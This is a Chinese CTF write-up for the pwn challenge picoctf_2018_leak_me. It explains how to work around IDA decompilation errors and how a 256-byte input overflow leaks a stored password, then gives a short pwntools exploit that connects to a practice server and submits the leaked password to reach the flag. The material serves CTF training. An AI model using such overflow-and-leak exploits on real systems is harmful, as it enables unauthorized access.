本文介绍了在解决CTF(Capture The Flag)中的pwn题目时,如何处理IDA反汇编错误,特别是针对`picoctf_2018_leak_me`挑战。作者分享了当遇到无法正常反汇编时的解决办法,并提供了利用输入溢出泄露password的思路。通过发送特定字符串,可以触发flag函数调用,从而获取比赛关键信息。
[BUUCTF-pwn]——picoctf_2018_leak_me
题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。
peak小知识
pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。
思路
在IDA中,v6代表name s是password.距离0x100也就是256。
输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函数了。
写个小dome leek出来password再说。
exploit
from pwn import *
p = remote("node3.buuoj.cn",27223)
p.sendline('a')
p.recv()
p.sendline('a_reAllY_s3cuRe_p4s$word_f85406')
p.interactive()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
